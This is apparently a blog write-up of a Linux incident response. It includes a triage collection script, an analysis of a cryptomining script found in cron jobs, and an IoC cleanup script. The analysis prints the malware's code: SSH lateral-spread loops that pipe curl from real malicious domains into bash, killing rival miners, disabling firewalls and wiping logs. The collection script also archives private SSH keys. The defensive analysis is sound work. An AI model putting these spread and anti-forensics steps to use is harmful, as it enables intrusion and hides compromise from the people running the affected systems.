Linux emergency response notes


Background

I handled an emergency response some time ago and wrote it up as a Linux emergency response notes article. In the past two days we handled another virus intrusion. Building on the earlier notes, I wrote some automation scripts for this response, which improved the efficiency of the work to some extent, so here is another set of notes.
PS: This article focuses on sharing emergency response experience. The malicious URLs are kept in the article, but the download paths of the malicious script and programs have been removed. The article is for technical discussion and analysis only and is strictly prohibited for any illegal purpose; violators bear the consequences themselves.

Emergency operation notes

Looking back at my last Linux emergency response notes, a long list of commands is dazzling and inconvenient to work through by hand. It is better to write a shell script that collects the information automatically.

Automated information collection

My automated information-collection script is as follows. The intention is to have the information collected automatically without me connecting to the customer's equipment, which improves operation and communication efficiency.


#!/bin/bash
# Collects triage data into /tmp/GatherInfo so the customer can run the script
# and send back a single archive. chkrootkit and busybox are expected to sit
# beside the script (busybox is made executable here but is not used below).

OUT=/tmp/GatherInfo

function initial(){
    echo "Doing initial"
    mkdir -p "$OUT"
    chmod +x ./chkrootkit
    chmod +x ./busybox
}

function chkrootkit_info(){
    echo "Doing chkrootkit"
    ./chkrootkit > "$OUT/chkrootkit.log" 2>&1
}

function network_info(){
    echo "Gathering network info"
    netstat -tulnp > "$OUT/netstat_tulnp.log" 2>&1
    netstat -anp > "$OUT/netstat_anp.log" 2>&1
}

function process_info(){
    echo "Gathering process info"
    ps aux > "$OUT/ps_aux.log" 2>&1
    ps auxef > "$OUT/ps_auxef.log" 2>&1
    # -b (batch mode) is required when top's output is redirected to a file
    top -b -n 1 > "$OUT/top_n1.log" 2>&1
}

function init_info(){
    echo "Gathering init info"
    chkconfig --list > "$OUT/chkconfig_list.log" 2>&1
    ls -alt /etc/init* > "$OUT/ls_alt_etc_init.log" 2>&1
}

function cron_info(){
    echo "Gathering cron info"
    cat /etc/crontab > "$OUT/crontab.log" 2>&1
    cat /etc/anacrontab > "$OUT/anacrontab.log" 2>&1
    crontab -l > "$OUT/crontab_l.log" 2>&1

    # Full paths instead of "cd dir; cat *": if a directory is missing, the cd
    # fails and "cat *" would silently dump the previous directory instead
    cat /etc/cron.d/* > "$OUT/etc_cron.d.log" 2>&1
    cat /etc/cron.daily/* > "$OUT/etc_daily.log" 2>&1
    cat /etc/cron.hourly/* > "$OUT/etc_hourly.log" 2>&1
    cat /etc/cron.monthly/* > "$OUT/etc_monthly.log" 2>&1
    cat /etc/cron.weekly/* > "$OUT/etc_weekly.log" 2>&1
    cat /var/spool/cron/* > "$OUT/var_spool_cron.log" 2>&1
    cat /var/spool/anacron/* > "$OUT/var_spool_anacron.log" 2>&1
}

function other_info(){
    echo "Gathering other info"
    grep -v nologin /etc/passwd > "$OUT/passwd.log" 2>&1
    ls -alt /tmp > "$OUT/tmp.log" 2>&1
    ls -alt /var/tmp > "$OUT/var_tmp.log" 2>&1
    ls -alt /dev/shm > "$OUT/dev_shm.log" 2>&1
    echo "$LD_PRELOAD" > "$OUT/LD_PRELOAD.log" 2>&1
    cat /etc/ld.so.preload > "$OUT/etc_ld.so.preload.log" 2>&1
    ls -alt /root/.ssh > "$OUT/ls_alt_root_.ssh.log" 2>&1
    # note: this also copies private keys into the archive, not only
    # authorized_keys and known_hosts
    cat /root/.ssh/* > "$OUT/cat_root_.ssh.log" 2>&1

    # $user is the full path (/home/name), so use its basename in the log name.
    # The original "$user_" was parsed by the shell as the empty variable "user_".
    for user in /home/*
    do
        if test -d "$user"; then
            cat "$user"/.ssh/* > "$OUT/cat_$(basename "$user")_.ssh.log" 2>&1
        fi
    done
}

initial
chkrootkit_info
network_info
process_info
init_info
cron_info
other_info

cd /tmp
tar -zcvf GatherInfo.tar.gz GatherInfo

Analysis of information collection results

Go through every file under GatherInfo (the automatically collected information) and sort the findings one by one against the checklist items below.

Emergency Response Checklist

(checklist image not included in this copy)

No abnormality was found in the process and network information. When checking the crontab for scheduled tasks, three abnormal cron entries were found:


59 * * * * root (curl -fsSL http://t.amynx.com/ ......
28 * * * * root (curl -fsSL http://t.jdjdcjq.top/ ......
13 * * * * root ps aux|grep lplp.ackng.com ......

I fetched the malicious script to my own machine. It is a shell script; let's analyse what it does.

Malicious script analysis

The malicious script has 439 lines of code. The first 300 or so delete files and kill processes (competing miners and anything that eats CPU). A few representative pieces are summarised below; the function bodies are abridged.


#/bin/bash
processes(){
    killme() {
      killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
    }

    killa() {
    what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
    }

    killa 34e2fg
    killme

    killall \.Historys
    killall \.sshd
    killall neptune
    killall xm64
    killall xm32
    killall xmrig
    killall \.xmrig
    killall suppoieup

    # sshd
    ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpid
    while read sshdpid
    do
        if [ $(echo  $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g')  -ge 60 ]
        then
            kill $sshdpid
        fi
    done < /tmp/ssdpid
    rm -f /tmp/ssdpid

# Removing miners by known path IOC
files(){
    ulimit -n 65535
    rm -rf /var/log/syslog
    chattr -iua /tmp/
    chattr -iua /var/tmp/
    chattr -R -i /var/spool/cron
    chattr -i /etc/crontab
    ufw disable
    iptables -F
    echo "nope" >/tmp/log_rot
    sudo sysctl kernel.nmi_watchdog=0
    echo '0' >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    rm /tmp/.cron
    rm /tmp/.main
    rm /tmp/.yam* -rf
    rm -f /tmp/irq

# Killing and blocking miners by network related IOC
network(){
    # Kill by known ports/IPs
    netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
    netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9

files
processes
network
echo "DONE"

Next, the script downloads malicious binaries and spreads laterally over SSH.

Code snippet 1
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ......
fi

Code snippet 2
for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &' & done
        fi
    fi
done

Code snippet 3
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &"
        done
      done
    done
  done

All three snippets spread laterally through SSH certificate (key-based) login, which succeeds without a password prompt: snippets 1 and 2 take target IPs from the known_hosts files of root and of each home directory, and snippet 3 loops over lists of users, hosts, keys and ports.


if [ ! -d "/.Xll" ];then
    mkdir /.Xll
fi
cd /.Xll
if [ ! -f "./xr" ];then
    uname -a|grep x86_64 && (curl -fsSL d.ackng.com/ ......
fi
uname -a|grep x86_64 && ps aux|grep lplp.ackng.com |grep -v grep || ./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529

The code above downloads a malicious binary, xr, into /.Xll, which should be the mining virus body, and runs it against the pool lplp.ackng.com:444 with typical miner options (donate level, nicehash, an HTTP API bound to 0.0.0.0:65529).

Finally, the script clears its traces:


history -c
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
echo > /root/.bash_history

Clean up and restore

According to the logic of the malicious script, the cleanup steps are as follows:

1. Delete the malicious crontab scheduled tasks
2. Kill the ./xr process
3. Delete the /.Xll directory

Summary and reflection

Virus identification

Directory and file: /.Xll and /.Xll/xr

Process indicator: ps aux | grep lplp.ackng.com

Two domains: t.amynx.com, t.jdjdcjq.top
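As an added example (not the post's own code and not part of the author's toolbox), here is a script that checks a host for the indicators listed above and applies the three cleanup steps from the previous section. The cron file locations in main() and the ps aux column layout are assumptions; the functions take file paths so they can also be run over the cron logs in the GatherInfo bundle.

```bash
#!/bin/bash
# Added example, not the post's own script: look for the indicators listed above
# and apply the cleanup steps. Paths are parameters so it also runs on copied files.
IOC_DOMAINS="t.amynx.com t.jdjdcjq.top lplp.ackng.com"   # from the cron lines
IOC_DIR="/.Xll"                                            # miner directory

# Print, with line numbers, the cron lines that reference an IoC domain.
# Exit status 0 if anything matched, 1 otherwise.
find_ioc_cron() {
    local file="$1" d
    [ -r "$file" ] || return 1
    set --
    for d in $IOC_DOMAINS; do set -- "$@" -e "$d"; done
    grep -n -F "$@" "$file"
}

# Remove those lines in place, keeping the original as FILE.bak.
remove_ioc_cron() {
    local file="$1" d
    cp -p "$file" "$file.bak"
    set --
    for d in $IOC_DOMAINS; do set -- "$@" -e "$d"; done
    grep -v -F "$@" "$file.bak" > "$file" || :   # grep -v exits 1 if nothing is left
}

# Read `ps aux` output on stdin; print PIDs whose command line mentions an IoC
# domain or the miner directory (the post's "ps aux | grep lplp.ackng.com").
find_ioc_pids() {
    awk -v doms="$IOC_DOMAINS" -v dir="$IOC_DIR" '
        BEGIN { n = split(doms, d, " ") }
        NR > 1 && index($0, "awk -v doms=") == 0 {   # skip this awk itself
            hit = index($0, dir) > 0
            for (i = 1; i <= n; i++) if (index($0, d[i]) > 0) hit = 1
            if (hit) print $2
        }'
}

# Live run: "--check" only reports; "--fix" also removes the cron lines, kills
# the miner and deletes its directory. Cron file locations are assumptions.
main() {
    for f in /etc/crontab /var/spool/cron/root /etc/cron.d/*; do
        [ -f "$f" ] && find_ioc_cron "$f" && [ "$1" = --fix ] && remove_ioc_cron "$f"
    done
    for pid in $(ps aux | find_ioc_pids); do
        echo "miner process $pid"; [ "$1" = --fix ] && kill -9 "$pid"
    done
    [ -d "$IOC_DIR" ] && ls -la "$IOC_DIR" && [ "$1" = --fix ] && rm -rf "$IOC_DIR"
    return 0
}
case "${1:-}" in --check|--fix) main "$1" ;; esac
```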

Mining is less of a threat than ransomware

Every time I encounter a virus intrusion I panic a little. A mining virus is bearable: in the worst case the environment is reinstalled, and the customer's data is safe. If it were ransomware, it would be very difficult.

In any case, try to keep the system secure and reduce the attack surface exposed to intrusion; that goes a long way toward keeping the system from being compromised.

Protection advice

Generally speaking, automated intrusions use very simple weaknesses: weak passwords, vulnerable components, unauthorized access, and so on. Another infection path is SSH certificate (key) authentication. As shown above, the script has three ways of spreading over SSH, and this method still seems very popular, so vendors still need to properly control SSH key-based login.

Finally, I have put the scripts and checklist used above at https://github.com/kafroc/emergency-response-toolbox ; readers who need them can download and use them, and any feedback is welcome.


Origin blog.csdn.net/pythonxuexi123/article/details/112983578